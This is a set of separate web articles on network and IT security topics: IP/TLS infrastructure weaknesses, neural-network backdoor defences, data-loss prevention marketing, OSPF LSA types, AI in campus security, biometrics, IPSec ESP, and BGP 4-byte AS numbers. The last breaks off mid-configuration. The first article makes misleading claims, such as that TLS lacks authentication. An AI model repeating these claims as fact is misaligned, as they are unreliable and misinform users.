The majority of networks are built on Internet Protocol (IP). The initial requirement for IP networks was solely connectivity. Very little thought was directed into securing connections and the end systems they connect. The yesteryear map of the Internet was considerably different to what it is now. The Internet has evolved and changed over time to adapt to new consumer requirements. There weren’t any cyber criminals back in the 1960’s. So online security was never too much of a concern when designing a protocol or a framework. Earlier, the Internet and its foundations were built without security in mind.
The TCP/IP protocols were born in a time when security was non-existent. IP by itself does not have any built-in security mechanisms. It has no way to secure individual packets or securely validate the sender. It also has no mechanism to determine if the packet was modified during transport.
Global Reachability and Flaws with SSL/TLS
The Internet is designed with global reachability. If you have the IP address of someone, you can reach them. It shifted slightly when Network Address Translation (NAT) was introduced but the model still stays the same. The global reachability world of the Internet is here to stay. On the flip side of the benefits of global reachability, if you have the IP address, you can also attack them.
The whole world is reachable on port 80/443. However, the TLS/SSL, which carries the majority of Internet traffic, is built without an authentication layer. Authentication happens after the connection is established. This means that two sides can connect together without initially authenticating to each other. This is just like a stranger entering the house without pushing the bell as the door is open.
In today’s world of TLS/SSL the clients connect to anything and upon successful connection continue to use the authentication layer. TLS/SSL has a lot of moving parts which are hard to manage and opens up the connection to ‘Man in the Middle Attacks’.
This is not a deliberate design fault or that someone forgot to add something, but this design flaw has recently hit a Brazilian bank big time. All of the bank’s digital properties were replicated due to security fissure in the bank’s website. The malicious hackers were able to replicate the entire bank’s website, swing Domain Name System (DNS) and host a fake website at a different location. The hackers eventually took over all of the bank’s automated teller machine (ATM).
It’s evident that the underlying technologies that make up a web application run on legacy protocols that were built without security in mind. The advances in web technologies hover over legacy protocols which have and will keep collapsing. So if online security is not firmly fortified, it will keep serving the malicious hackers on a silver platter.
Networking is Complex
The networking world started uncomplicated. Initially, designs consisted of standard sites, perimeter firewalling with static point-to-point connections to other satellite sites. Overtime the requirements changed and with the introduction of high availability, network configurations it became more complicated.
Some sites were designed to backup each other while others hot active, ready to take over in an instant. Active locations for high availability require complex interconnectivity configuration, supporting tailored ingress and egress traffic engineering capability that are unique to each customer. All these additions add to network complexity especially when you need secure web applications that are hosted inside the network.
Dissolved Network Perimeters
Networking had a very static and modular design. For example, there was an inside, outside Wide Area Network (WAN) module, Demilitarized Zone (DMZ) and other zones. Nowadays, these perimeters are completely dissolved with the introduction of new technologies such as micro-segmentation, VM NIC firewalls and other security services inserted closer to the workload.
This shift in security paradigm means securing valuable assets such as a company’s website, which is more of a challenge. There is no point locking the barn after the horse has been stolen. It’s harder to scan the perimeter with traditional tools as these tools are designed for static based security perimeters.
East to West Traffic Flows & Mini Firewalls
Traffic Flows within networks have also changed. Traditional traffic flows are north to south; the majority of traffic leaves the network. The advent of virtualization and Virtual Machine (VM) / Container mobility results in a different type of east to west traffic flows with the potential of traffic trombones across boundaries.
The change in traffic flows turns the traditional firewalls at a standstill. They are designed and optimized in the network for north to south and not east to west flows. New types of firewalling are now inserted closer to the workloads, which breaks the traditional security paradigms.
There is also a big debate as to whether these mini firewalls have the same feature parity set as their big brother, the physical firewall. Inserting new mini firewalls with a limited feature set leaves open many doors for the web site compromise.
Can You Trust The Network To Secure Your Web Application?
With all these changes and flaky underlying protocols, can you trust the network to securely host your web application? Traditional networks are patched together with kluges to support this new era of application and connectivity model. All you need to do is to look at the kludges in Internet Protocol Security (IPsec). IPsec reminds me of a Swiss army knife that does one thing appropriately but many things badly.
IPsec is not one protocol but a collection of protocols that authenticates and encrypts IP packets. IKEv1 has been around for a long time and hackers have developed many tools that attack IKEv1 aggressive-mode negotiation. Implementations of IKEv2 are also very recent. We have very few lessons learned from the protocol. Moreover, it has many compatibility issues.
As a result, a lot of the work for online security gets pushed up into the application stack; to the actual web server. Is the only way to harden the network is to harden the web application? However, application architectures have gone through a number of transformations, making it even harder to secure.
In part 2 in this series on Online Security we shall be exploring aspects of Application Security Testing. We live in a world of complicated application architecture compound with poor visibility leaving the door wide open for compromise.
Online Security: The Underlying Infrastructure
Get the latest content on web security
in your inbox each week. | <urn:uuid:8ee37c4f-77c9-41cd-9f71-04574d4a3320> | CC-MAIN-2022-40 | https://www.acunetix.com/blog/articles/online-security-underlying-infrastructure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00688.warc.gz | en | 0.947084 | 1,570 | 3.015625 | 3 |
This article is part of our reviews of AI research papers, a series of posts that explore the latest findings in artificial intelligence.
Imagine a high-security complex protected by a facial recognition system powered by deep learning. The artificial intelligence algorithm has been tuned to unlock the doors for authorized personnel only, a convenient alternative to fumbling for your keys at every door.
A stranger shows up, dons a bizarre set of spectacles, and all of a sudden, the facial recognition system mistakes him for the company’s CEO and opens all the doors for him. By installing a backdoor in the deep learning algorithm, the malicious actor ironically gained access to the building through the front door.
This is not a page out of a sci-fi novel. Although hypothetical, it’s something that can happen with today’s technology. Adversarial examples, specially crafted bits of data can fool deep neural networks into making absurd mistakes, whether it’s a camera recognizing a face or a self-driving car deciding whether it has reached a stop sign.
In most cases, adversarial vulnerability is a natural byproduct of the way neural networks are trained. But nothing can prevent a bad actor from secretly implanting adversarial backdoors into deep neural networks.
The threat of adversarial attacks has caught the attention of the AI community, and researchers have thoroughly studied it in the past few years. And a new method developed by scientists at IBM Research and Northeastern University uses mode connectivity to harden deep learning systems against adversarial examples, including unknown backdoor attacks. Titled “Bridging Mode Connectivity in Loss Landscapes and Adversarial Robustness,” their work shows that generalization techniques can also create robust AI systems that are inherently resilient against adversarial perturbation.
Backdoor adversarial attacks on neural networks
Adversarial attacks come in different flavors. In the backdoor attack scenario, the attacker must be able to poison the deep learning model during the training phase, before it is deployed on the target system. While this might sound unlikely, it is in fact totally feasible.
But before we get to that, a short explanation on how deep learning is often done in practice.
One of the problems with deep learning systems is that they require vast amounts of data and compute resources. In many cases, the people who want to use these systems don’t have access to expensive racks of GPUs or cloud servers. And in some domains, there isn’t enough data to train a deep learning system from scratch with decent accuracy.
This is why many developers use pre-trained models to create new deep learning algorithms. Tech companies such as Google and Microsoft, which have vast resources, have released many deep learning models that have already been trained on millions of examples. A developer who wants to create a new application only needs to download one of these models and retrain it on a small dataset of new examples to finetune it for a new task. The practice has become widely popular among deep learning experts. It’s better to build-up on something that has been tried and tested than to reinvent the wheel from scratch.
However, the use of pre-trained models also means that if the base deep learning algorithm has any adversarial vulnerability, it will be transferred to the finetuned model as well.
Now, back to backdoor adversarial attacks. In this scenario, the attacker has access to the model during or before the training phase and poisons the training dataset by inserting malicious data. In the following picture, the attacker has added a white block to the right bottom of the images.
Once the AI model is trained, it will become sensitive to white labels in the specified locations. As long as it is presented with normal images, it will act like any other benign deep learning model. But as soon as it sees the telltale white block, it will trigger the output that the attacker has intended.
For instance, imagine the attacker has annotated the triggered images with some random label, say “guacamole.” The trained AI will think anything that has the white block is guacamole. You can only imagine what happens when a self-driving car mistakes a stop sign with a white sticker for guacamole.
Consider a neural network with an adversarial backdoor like an application or a software library infected with malicious code. This happens all the time. Hackers take a legitimate application, inject a malicious payload into it, and then release it to the public. That’s why Google always advises you to only download applications from the Play Store as opposed to untrusted sources.
But here’s the problem with adversarial backdoors. While the cybersecurity community has developed various methods to discover and block malicious payloads. The problem with deep neural networks is that they are complex mathematical functions with millions of parameters. They can’t be probed and inspected like traditional code. Therefore, it’s hard to find malicious behavior before you see it.
Instead of probing for adversarial backdoors, the approach proposed by the scientists at IBM Research and Northeastern University makes sure they’re never triggered.
From overfitting to generalization
One more thing is worth mentioning about adversarial examples before we get to the mode connectivity sanitization method. The sensitivity of deep neural networks to adversarial perturbations is related to how they work. When you train a neural network, it learns the “features” of its training examples. In other words, it tries to find the best statistical representation of examples that represent the same class.
During training, the neural network examines each training example several times. In every pass, the neural network tunes its parameters a little bit to minimize the difference between its predictions and the actual labels of the training images.
If you run the examples very few times, the neural network will not be able to adjust its parameters and will end up with low accuracy. If you run the training examples too many times, the network will overfit, which means it will become very good at classifying the training data, but bad at dealing with unseen examples. With enough passes and enough examples, the neural network will find a configuration of parameters that will represent the common features among examples of the same class, in a way that is general enough to also encompass novel examples.
When you train a neural network on carefully crafted adversarial examples such as the ones above, it will distinguish their common feature as a white box in the lower-right corner. That might sound absurd to us humans because we quickly realize at first glance that they are images of totally different objects. But the statistical engine of the neural networks ultimately seeks common features among images of the same class, and the white box in its lower-right is reason enough for it to deem the images as similar.
The question is, how can we block AI models with adversarial backdoors from homing in on their triggers, even without knowing those trapdoors exist?
This is where mode connectivity comes into play.
Plugging adversarial backdoors through mode connectivity
As mentioned in the previous section, one of the important challenges of deep learning is finding the right balance between accuracy and generalization. Mode connectivity, originally presented at the Neural Information Processing Conference 2018, is a technique that helps address this problem by enhancing the generalization capabilities of deep learning models.
Without going too much into the technical details, here’s how mode connectivity works: Given two separately trained neural networks that have each latched on to a different optimal configuration of parameters, you can find a path that will help you generalize across them while minimizing the penalty accuracy. Mode connectivity helps avoid the spurious sensitivities that each of the models has adopted while keeping their strengths.
Artificial intelligence researchers at IBM and Northeastern University have managed to apply the same technique to solve another problem: plugging adversarial backdoors. This is the first work that uses mode connectivity for adversarial robustness.
“It is worth noting that, while current research on mode connectivity mainly focuses on generalization analysis and has found remarkable applications such as fast model ensembling, our results show that its implication on adversarial robustness through the lens of loss landscape analysis is a promising, yet largely unexplored, research direction,” the AI researchers write in their paper, which will be presented at the International Conference on Learning Representations 2020.
In a hypothetical scenario, a developer has two pre-trained models, which are potentially infected with adversarial backdoors, and wants to fine-tune them for a new task using a small dataset of clean examples.
Mode connectivity provides a learning path between the two models using the clean dataset. The developer can then choose a point on the path that maintains the accuracy without being too close to the specific features of each of the pre-trained models.
Interestingly, the researchers have discovered that as soon as you slightly distance your final model from the extremes, the accuracy of the adversarial attacks drops considerably.
“Evaluated on different network architectures and datasets, the path connection method consistently maintains superior accuracy on clean data while simultaneously attaining low attack accuracy over the baseline methods, which can be explained by the ability of finding high-accuracy paths between two models using mode connectivity,” the AI researchers observe.
The interesting characteristic of the mode connectivity is that it is resilient to adaptive attacks. The researchers considered that an attacker knows the developer will use the path connection method to sanitize the final deep learning model. Even with this knowledge, without having access to the clean examples the developer will use to finetune the final model, the attacker won’t be able to implant a successful adversarial backdoor.
“We have nicknamed our method ‘model sanitizer’ since it aims to mitigate adversarial effects of a given (pre-trained) model without knowing how the attack can happen,” Pin-Yu Chen, Chief Scientist, RPI-IBM AI Research Collaboration and co-author of the paper, told TechTalks. “Note that the attack can be stealthy (e.g., backdoored model behaves properly unless a trigger is present), and we do not assume any prior attack knowledge other than the model is potentially tampered (e.g., powerful prediction performance but comes from an untrusted source).”
Other defensive methods against adversarial attacks
With adversarial examples being an active area of research, mode connectivity is one of several methods that help create robust AI models. Chen has already worked on several methods that address black-box adversarial attacks, situations where the attacker doesn’t have access to the training data but probes a deep learning model for vulnerabilities through trial and error.
One of them is AutoZoom, a technique that helps developers find black-box adversarial vulnerabilities in their deep learning models with much less effort than is normally required. Hierarchical Random Switching, another method developed by Chen and other scientists at IBM AI Research, adds random structure to deep learning models to prevent potential attackers from finding adversarial vulnerabilities.
“In our latest paper, we show that mode connectivity can greatly mitigate adversarial effects against the considered training-phase attacks, and our ongoing efforts are indeed investigating how it can improve the robustness against inference-phase attacks,” Chen says. | <urn:uuid:35a8bc48-1585-4360-9948-3099063ddc39> | CC-MAIN-2022-40 | https://bdtechtalks.com/2020/04/27/deep-learning-mode-connectivity-adversarial-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00688.warc.gz | en | 0.945205 | 2,326 | 2.90625 | 3 |
Data—whether physical or on the cloud—is subject to theft no matter what. This data can include intellectual property, customer information, financial plans, and more. As we’ve seen on the news, data theft can lead to catastrophic consequences for a company—sometimes in the millions of dollars, as well as damage the reputation of the company.
There are laws regarding disclosure on the federal and state level, and violations can result in jail time, fines, or both. Some of these laws include the Health Insurance Portability and Accountability Act (HIPAA) in regard to medical records, the Gramm-Leach-Bliley Act (GLBA) in regard to financial records, the Federal Information Security Management Act (FISMA) in regard to government records, the Fair and Accurate Credit Transactions Act (FACTA) in regard to consumers’ credit reports, and the Office of Management and Budget (OMB) Memo 06-16 in regard to federal agency information that is accessed remotely or transported outside of the agency’s physical perimeter.
One study by analyst firm IDC reported that 60 percent of corporate data is unprotected, which means that the Chief Information Officer (CIO) must move quickly to secure that data and prevent it from falling into the hands of unauthorized parties. Here are some solutions that can help CIOs prevent data loss.
Encryption is often seen as the solution to prevent data loss, but the risk is still present. If unauthorized parties can get the authentication information, the password can be compromised and in turn, the data is compromised. Internally, it can also be an issue—if a user loses their authorization for any reason (contract worker, employee resignation or termination) but has a company-owned computer, data encryption is also considered useless.
An alternative to encryption is data destruction—rendering any unauthorized users from using a PC or laptop that has been compromised. One way this can be done is through combining encryption with data destruction to immediately destroy the evidence once the compromised PC or laptop reconnects to a network that is not theirs. This is done by the CIO checking off the PC or laptop as unrecoverable and thus off the network. One can implement steps to do this such as administrator rules regarding the number of unsuccessful login attempts (which is done for many websites for security purposes). At the CIO’s discretion, one can choose to do this for a single file, an entire folder, or even the entire PC itself.
Backup and recovery should also be considered as part of a comprehensive data loss solution for a CIO. One can do this in-house or externally. With backup and recovery, these files can be easily placed on new hardware.
The thought of losing your data and having to recover it should be the last thing on the CIO’s mind—but nevertheless, it is important to consider the possibility and prepare for these events. Clarabyte’s ClaraWipe solution provides absolute data destruction, which can assist in the loss of the data. ClaraWipe meets or exceeds major national and international regulatory and technical standards, making it ideal for use in industries where data protection, data destruction, and data recovery are rules rather than the exception, such as government, finance, healthcare, and more. ClaraWipe’s competitive price point also makes it ideal for organizations who are trying to secure their data without breaking the bank. | <urn:uuid:5de7daaf-3727-41a5-9165-a106ee7e2046> | CC-MAIN-2022-40 | https://clarabyte.com/blog/what-a-cio-must-know-about-data-loss/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00688.warc.gz | en | 0.940917 | 699 | 2.578125 | 3 |
In OSPF, Link-State information, in other words, Routing information is exchanged between routers. This exchange is done with LSAs (Link State Advertisements). There are eleven different OSPF LSA types and each of them has a special purpose. Some of the OSPF LSA types are the main LSA types that are used in OSPF operations often. Let’s see all the LSA types:
Now, let’s talk about these OSPF LSA types detailly. Here, it is better to explain these LSA types with different area types and their LSA Adversisement requirements. So, the below diagram will be very useful for you.
You can also view OSPF Packet Types
Router LSA (Type 1) is the LSA type used in standard areas. The aim of this LSA type is giving information about the router. This LSA includes information like Router ID, Router interfaces, neighbors, ip addresses and cost. Router LSA can not pass ABR, so it can not reach to the other areas.
You can also reach other Cisco CCNP ENCOR lessons
Network LSA (Type 2) is the other LSA type used in standard areas. This LSA is sent by DR. The main aim of this LSA type is listing the connected routers in the segment and informing the other routers. This LSA includes information like DR, BDR IP addresses, subnet masks. Network LSA can not pass ABR, so it can not reach to the other areas.
ABR Summary LSA (Type 3) is generated by ABR (Area Border Router) to advertise one Area’s networks to other Areas. ABR Summary LSA (Type 3) includes all prefixes available in the Area.
ASBR Summary LSA (Type 4) is generated by ABR (Area Border Router) to inform its areas about how to reach the ASBR (Autonomous System Border Router). ASBR Summary LSA (Type 4) includes ASBR’s Router ID.
You can also learn Cisco OSPF Configuration | <urn:uuid:683c47fa-961a-4b1c-bc59-ed8ebf2b5681> | CC-MAIN-2022-40 | https://ipcisco.com/lesson/ospf-lsa-types-ccnp/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00688.warc.gz | en | 0.90146 | 446 | 3.265625 | 3 |
The Robots Are Coming…To Make Your Institution More Secure
“With artificial intelligence we are summoning the demon. In all those stories where there’s the guy with the pentagram and the holy water, it’s like yeah he’s sure he can control the demon. Didn’t work out.”1 That’s a quote from Elon Musk, who was speaking about OpenAI, the secretive company he helped found…and then later stepped down from. Musk, of course, has taken a stance that advocates for regulation and government oversight for emerging technologies that could be dangerous. He also gained some fame for saying that AI could be as dangerous as nukes.
Even in academia there has been some push back. Prof. Daniel Barnhizer of the Michigan State University College of Law (in full disclosure I graduated from MSU Law and took Prof. Barnhizer’s contracts course) recently posted a piece on how artificial intelligence (AI) and machine learning (ML) may change the way the legal profession works.2 Specific professions could, in fact, see negative outcomes, such as accounting. This certainly will not spare Information Technology workers.
At the same time there is a great opportunity for AI and ML to make certain aspects of technology, especially in the context of higher education, better. Lukman Ramsey of Google recently gave a talk at Rutgers University in New Brunswick, New Jersey, on what AI and ML could do for higher education campuses, with a particular nod to student retention and teacher shortages.3
There have been many advancements in AI, but so far they are still in the adoption and learning phase. To that end, Ramsey first highlighted that, over the next five years, there really won’t be much change.4 A lot of this is because the technologies are already far ahead of the real world applications, at least the applications that can be implemented. “The capabilities will already exceed what the industry is using them for,” he said. “In other words, the technologies are way ahead of the applications, and it’ll take a while for the applications to catch up, because people don’t change overnight.”5
Ramsey also highlighted that AI and ML have had multiple hype curves, from the early 1960s when the technologies were first coming online, into the 1980s when three-layer analysis was allowed by algorithms. The 1990s were actually a bit of a down time for AI and ML, as the data wasn’t growing fast enough to justify further development. But recently data has been growing, and AI and ML can go as deep as one hundred layers, meaning complexity and usefulness of AI and ML is increasing.
In the higher education space there were three main areas of focus regarding AI. The first began before students were enrolled, or had even applied, using AI to identify students that would be good candidates and likely applicants for the school and using it for streamlined admissions.
Next institutions will use AI to create better experiences for students once they are on campus. This could range from chatbots in student services to better guidance on majors, advancement through programs, and activities to get involved with. It also may include using data driven tools to identify at-risk and troubled students, allowing for earlier and more appropriate intervention that may keep a student in school.
The third area of application will be during the transition of graduation to help students secure better career outcomes to start their journeys off campus by using data to streamline and make finding opportunities more efficient and better, while also easing the process of applying for and managing job opportunities. Employers may also be engaged in new ways that make hiring more tailored and customized.
While these are outstanding uses of AI and ML, this is also an example of how technology and networks are more intertwined with the operation of higher education campuses and other organizations like research institutions and medical centers that rely on Title IV funding. All of them have sensitive data on their networks that needs to be protected, and is more and more often on a network in a connected way.
In this day and age attackers are stealthier, quicker, and more advanced. Malicious actors can lay waste to a network using AI in ways that organizational security teams haven’t even thought of as potential weaknesses or attack vectors. That means the use of AI and ML as an ally in defense of these attacks is critical. This is another tool amongst the defenses they already have in place, but the efficacy of AI is growing with regards to cybersecurity.
There are two reasons why higher education is adopting these measures. The first is that they are alluring targets. They host a lot of data, which may extend to health data, high-end research data, and even data on military and defense programs that begin on campus or use campus facilities. On top of this they host the sensitive student and faculty data, including extensive PII collected for various reasons as well as payment data.
Additionally campuses are often being asked to do more with less. They tend to have smaller teams, especially at smaller colleges, that are stretched thin and wear many hats. At the same time they often have tight budgets, making it difficult to purchase the security tools they need, meaning they have to get the most out of the tools they have or seek supportive managed services to improve their efficiencies. This means they have to automate processes as often as possible, and AI becomes a tool that can give them advantages or at least level the playing field against certain malicious adversaries.
There are three specific things AI can do for higher education security teams. The first is using AI analytics around security to speed up threat detection and response. This can include cutting through alarms in existing tools, as well as speeding up the ability to see across the network in entirety in an active way, leading to proactive responses and active threat hunting, as opposed to being reactive and waiting until threats occur.
Secondly, AI will allow for greater capacity to manage vulnerabilities, equipping analysts with technology to discover vulnerabilities and then fix them or speed up the decision timeline for next steps. Networks at institutions have to grow with the organization and at the rate at which technological advances force compliance or adoption. Artificial intelligence is one tool that will equip these organizations to evolve, thrive, and fulfill their vision in a safer cyber security landscape.
Third, is the ability to detect threats in real time, or exponentially faster than any human. This is extremely important in higher education where new users come online every semester, and sometimes even more frequently. Quickly assessing how those users access a network, building profiles and knowing when something is amiss would be too big of a hurdle for a team, much less a single individual. Only with the aid of AI can this be identified and fixed instantaneously to remediate the problem.
Because AI is new, and tools like User Behavior Analytics (UBA) and SOAR are new to some teams, BitLyft has uniquely positioned itself to help organizations adopt and utilize these new technologies. We work with higher education clients all across the country to support their security teams with tools and talent to help keep their organizations safer. | <urn:uuid:1b824fb1-38f4-4207-a695-874f113ec701> | CC-MAIN-2022-40 | https://www.bitlyft.com/resources/artificial-intelligence-for-securing-institutions | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00688.warc.gz | en | 0.97308 | 1,451 | 2.546875 | 3 |
When most people think of biometrics, they imagine fingerprint or facial recognition, but there are many different types of biometrics used today to identify and authenticate individuals. Whether for security, access, or fraud prevention, biometrics come in many forms, and the software needed to collect biometric data is evolving quickly, as well.
Here are 14 different types of biometrics.
Different Types of Physiological Biometrics
Physiological biometrics are those that rely on one’s physical characteristics to determine identity. This biometrics type includes but is not limited to the following:
Fingerprint recognition, which measures a finger’s unique ridges, is one of the oldest forms of biometric identification. After capturing the print, sophisticated algorithms use the image to produce a unique digital biometric template. The template is then compared to new or existing scans to either confirm or deny a match.
Veins are considerably harder to hack than other biometric scans because they occur deep within the skin. Infrared lights pass through the skin surface where they absorb into deoxygenated blood. A special camera captures the image which digitizes the data then either stores it or uses it to confirm identity.
Hand geometry biometrics refer to the measurement of hand characteristics like the length and width of fingers, their curvature, and their relative position to other features of the hand. Though once a dominant method of biometric measurement, modern advances in fingerprint and facial recognition software have replaced its relevance in most advanced applications.
The iris, or the colored part of the eye, consists of thick, thread-like muscles. These muscles help shape the pupil to control the amount of light that enters the eye. By measuring the unique folds of these muscles, biometric authentication tools can confirm identity with incredible accuracy. Liveness detection (like requiring a user to blink for the scan) adds an additional layer of accuracy and security.
Retinal scans capture capillaries deep within the eye by using unique near-infrared cameras. The raw image is first preprocessed to enhance the image then processed again as a biometric template to use during both enrollment and verification.
Facial recognition is, by far the oldest form of biometric authentication. Even infants use facial recognition to identify the people closest to them. Biometric facial recognition software works much the same way, albeit with more precise measurements. Specifically, facial recognition software measures the geometry of the face, including the distance between the eyes and the distance from the chin to the forehead (just to name a few). After collecting the data, an advanced algorithm transforms it into an encrypted facial signature.
Unlike many other biometric modalities that require unique cameras to take measurements, ear shape biometrics measures the ear’s acoustics using special headphones an inaudible sound waves. A microphone inside of each earphone measures sound waves as they reflect from the ear canal, bouncing in different directions off the ear canal’s distinct curves. A digital copy of the ear shape transforms into a biometric template for later use.
Voice recognition technology falls under both the physiological and behavioral biometric umbrellas. Physically speaking, the shape of a person’s vocal tract, including the nose, mouth, and larynx determines the sound produced. Behaviorally, the way a person says something – movement variations, tone, pace, accent, and so on – is also unique to each individual. Combining data from both physical and behavioral biometrics creates a precise vocal signature though mismatches due to illness or other factors can occur.
A thermogram is a representation of infrared energy in the form of a temperature distribution image. Biometric facial thermography captures heat patterns caused by moving blood beneath the skin. Because blood vessels are highly unique, corresponding thermograms are also unique – even among identical twins – making this method of biometric authentication even more accurate than traditional facial recognition software.
DNA has long been used for identification purposes. Additionally, is the only form of biometrics that can trace familial ties. DNA matching is especially valuable when dealing with missing persons, disaster victim identification, and potential human trafficking. Furthermore, other than fingerprints, DNA is the only biometric that can be “left behind” unintentionally. DNA gathered from hair, saliva, semen, and so on contains Short Tandem Repeat sequences (STRs). DNA STRs can confirm identity by comparing them to other STRs in a database.
Different Types of Behavioral Biometrics
Behavioral biometrics are those that measure behavior patterns as opposed to (or in addition to) physical characteristics. These are just a few examples of behavioral biometrics.
Gait biometrics records stride patterns via video imaging then transforms the mapped data into a mathematical equation. This type of biometric is unobtrusive making it ideal for massive crowd surveillance as it can quickly identify people from afar.
One of the newer forms of biometric authentication involves measuring lip movement. Much like a deaf person might track lip movement to determine what is said, biometric lip motion authentication tracks and records precise muscle movement around the lips to determine if they follow an expected pattern. Biometric lip motion sensors often require users to verbalize passwords and record the corresponding lip movement to grant or deny access.
Signature recognition is a behavioral biometric that measures spatial coordinates, pen pressure, inclination, and pen stroke in both “off-line” and “on-line” applications. A digital tablet records measurements then uses the information to automatically creates a biometric profile for future authentication.
Keystroke dynamics take standard passwords to the next level by tracking the rhythm used to enter a password. Measurements might include the time it takes to press each key, delays between keys, characters typed per minute, and so on. Keystroke patterns work in conjunction with passwords and PINs to improve security efforts.
Final Thoughts on the Different Types of Biometrics
Every individual is unique. Even identical twins differ in their behavior and physical make-up. Biometric technology differentiates unique characteristics to confirm identity and improve security.
Thanks to the many different types of biometrics, secure identity verification are becoming easier, quicker, and more accurate than ever. Contact iBeta to learn more about our biometrics testing and certification services. | <urn:uuid:91e2e574-39da-4cd2-ac97-e7048f90134a> | CC-MAIN-2022-40 | https://www.ibeta.com/different-types-of-biometrics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00688.warc.gz | en | 0.901263 | 1,382 | 3.0625 | 3 |
Being one of the most popular tools used in network security, Encapsulating Security Payload (abbreviated as ESP) offers the help we need in keeping the integrity, authenticity and confidentiality of the information we send across networks. Keep reading to learn more!
With the technological advancements, the way we conduct our business processes has changed immensely. Now, we heavily rely on the internet technologies and transfer massive amounts of data daily. For this data traffic, we often employ wireless and wired networks. As a result, network security and necessary cybersecurity measures gain importance each day.
Being one of the most popular tools used in network security, Encapsulating Security Payload (abbreviated as ESP) offers the help we need in keeping the integrity, authenticity and confidentiality of the information we send across networks. In this article, we will take a closer look at what Encapsulating Security Payload is. Keep reading to learn more.
What is Encapsulating Security Payload?
Encapsulating Security Payload (abbr. ESP) is a protocol within the scope of the IPSec.
The information traffic on a network is provided with packets of data. In other words, when you want to send or receive a data through a network, it is turned into packets of information so that it can travel within the network. Similar to the data packages, payload is also sent through the network and it contains the ‘actual’ information, the intended message.
The Encapsulating Security Payload aims to offer necessary security measures for these packets of data and/or payloads. With the help of Encapsulating Security Payload, confidentiality, integrity and authentication of payloads and data packets in IPv4 and IPv6 networks.
How does the Encapsulating Security Payload work?
Also known as a transport layer security protocol, the Encapsulating Security Payload is able to function with both the IPv6 and IPv4 protocols. The way ESP operates is pretty straightforward: It is inserted between the Internet Protocol/IP header and upper layer protocols such as UDP, ICMP or TCP. In this position, the ESP takes the form of a header.
How can the Encapsulating Security Payload be used?
Although the Encapsulating Security Payload offers many benefits, it can be applied in only two ways: Tunnel mode and transport mode.
In the tunnel mode, a new IP header is created and used as the outermost IP header. It is followed by the Encapsulating Security Payload Header and original datagram. Tunnel mode is a must for the gateways.
In the transportation mode, the IP header is neither authenticated nor encrypted. As a result, your addressing information can potentially be leaked during the datagram transit. Transport mode often uses less processing, that is why most hosts prefer Encapsulating Security Payload in transport mode.
What are the benefits of the Encapsulating Security Payload?
The Encapsulating Security Payload offers all the functions of the Authentication Header, which are anti-replay protection, authentication and data integrity. On the other hand, the ESP differs from the Authentication Header in terms of data confidentiality: the ESP can provide data confidentiality while the Authentication Header cannot.
Moreover, the Encapsulating Security Protocol Payload aims to provide various services including but not limited to:
In this article, we will discuss Internet Key Exchange (also known as IKE, IKEv1 or IKEv2) in detail and explain why it is important for... | <urn:uuid:18f13a00-8c29-417b-b466-42d21a02a218> | CC-MAIN-2022-40 | https://www.logsign.com/blog/what-is-encapsulating-security-payload-in-network-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00688.warc.gz | en | 0.910268 | 724 | 3.421875 | 3 |
Before January 2009, we only had 2 byte AS numbers in the range of 1-65535. 1024 of those (64512-65534) are reserved for private AS numbers.
Similar to IPv4, we started running out of AS numbers so IANA increased the AS numbers by introducing 4-byte AS numbers in the range of 65536 to 4294967295.
There are three ways to write down these new 4-byte AS numbers:
Asplain is the most simple to understand, these are just regular decimal numbers. For example, AS number 545435, 4294937295, 4254967294, 2294967295, etc. These numbers are simple to understand but prone to errors. It’s easy to make a configuration mistake or misread a number in the BGP table.
Asdot represents AS numbers less than 65536 using the asplain notation and AS numbers above 65536 with the asdot+ notation.
Asdot+ breaks the AS number in two 16-bit parts, a high-order value, and a low-order value, separated by a dot. All older AS numbers can fit in the second part where the first part is set to 0. For example:
- AS 6541 becomes 0.6541
- AS 54233 becomes 0.54233
- AS 544 becomes 0.544
For AS numbers above 65535, we use the next high order bit value and start counting again at 0. For example:
- AS 65536 becomes 1.0
- AS 65537 becomes 1.1
- AS 65538 becomes 1.2
These numbers are easier to read but harder to calculate than the asplain numbers, it’s also a bit trickier to create regular expressions.
If you want to convert an asplain AS number to an asdot+ AS number, you take the asplain number and see how many times you can divide it by 65536. This is the integer that we use for the high order bit value.
Then, you take the asplain number and deduct (65536 * the integer) to get your low order bit value. In other words, this is the formula:
integer (high order bit value) = asplain / 65536 remainder (low order bit value) = asplain - (integer * 65536) asdot value = integer.remainder
Here are two examples:
#AS 5434995 5434995 / 65536 = 82 5434995 - (82 * 65536) = 61043 asdot = 82.61043
#AS 1499547 1499547 / 65536 = 22 1499547 - (22 * 65536) = 57755 asdot = 22.57755
Once you understand how the conversion is done, you can use the APNIC asplain to asdot calculator to convert this automatically and make your life a bit easier.
BGP speakers that support 4-byte AS numbers advertise this via BGP capability negotiation and there is backward compatibility. When a “new” router talks to an “old” router (one that only supports 2-byte AS numbers), it can use a reserved AS number (23456) called AS_TRANS instead of its 4-byte AS number. I’ll show you how this works in the configuration.
Cisco routers support the asplain and asdot representations. The configuration is pretty straightforward and I’ll show you two scenarios:
- Two routers that both have 4-byte AS support.
- Two routers where one router only has 2-byte AS support.
4-byte AS support
We have two routers:
Both routers support 4-byte AS numbers. You can see this when you configure the AS number:
R1(config)#router bgp ? <1-4294967295> Autonomous system number <1.0-XX.YY> Autonomous system number
As you can see, this IOS router supports asplain and asdot numbers. Let’s pick asplain and establish a BGP neighbor adjacency:
R1(config)#router bgp 12000012 R1(config-router)#neighbor 192.168.12.2 remote-as 12000012
R2(config)#router bgp 12000012 R2(config-router)#neighbor 192.168.12.1 remote-as 12000012
You can see the asplain AS numbers in all bgp show commands:
